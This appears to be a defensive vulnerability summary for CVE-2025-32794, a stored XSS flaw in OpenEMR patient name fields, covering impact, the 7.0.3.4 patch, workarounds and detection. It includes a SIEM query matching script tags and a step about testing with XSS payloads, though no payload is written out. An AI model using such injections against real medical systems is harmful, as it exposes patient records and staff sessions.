CVE-2025-32794
📋 TL;DR
OpenEMR versions before 7.0.3.4 have a stored XSS vulnerability where authenticated users with patient creation privileges can inject malicious JavaScript into patient name fields. This code executes when viewing patient encounter orders, potentially compromising other users' sessions. All OpenEMR instances running vulnerable versions are affected.
💻 Affected Systems
- OpenEMR
📦 What is this software?
Openemr by Open Emr
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, modify patient records, install backdoors, or pivot to other systems in the healthcare network.
Likely Case
Session hijacking, data theft from other users viewing patient records, or defacement of medical records.
If Mitigated
Limited to authenticated users with specific privileges, reducing attack surface but still allowing privilege escalation within the application.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once credentials are obtained; stored XSS payloads are simple to craft.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.0.3.4
Vendor Advisory: https://github.com/openemr/openemr/security/advisories/GHSA-3c27-2m7h-f7rx
Restart Required: No
Instructions:
1. Backup your OpenEMR installation and database. 2. Download OpenEMR 7.0.3.4 from the official repository. 3. Replace vulnerable files with patched versions. 4. Verify proper input validation on patient name fields.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side input validation to sanitize HTML/JavaScript in patient name fields
Modify patient registration PHP files to use htmlspecialchars() or similar sanitization functions
Privilege Reduction
allTemporarily restrict patient creation privileges to essential personnel only
Update user roles in OpenEMR admin interface to remove patient creation from non-essential users
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in patient registration requests
- Enable Content Security Policy (CSP) headers to restrict script execution
🔍 How to Verify
Check if Vulnerable:
Check if OpenEMR version is below 7.0.3.4 and test if unsanitized HTML/JavaScript in patient name fields persists and executes in Orders → Procedure Orders viewCheck Version:
Check OpenEMR version in admin interface or examine version.php fileVerify Fix Applied:
After patching, attempt to inject test XSS payloads in patient name fields and verify they are properly sanitized when displayed📡 Detection & Monitoring
Log Indicators:
- Unusual patient name entries containing script tags or JavaScript code
- Multiple patient creations by single user in short timeframe
Network Indicators:
- HTTP requests with suspicious payloads in patient registration parameters
SIEM Query:
source="openemr_logs" AND (patient_name CONTAINS "<script>" OR patient_name CONTAINS "javascript:")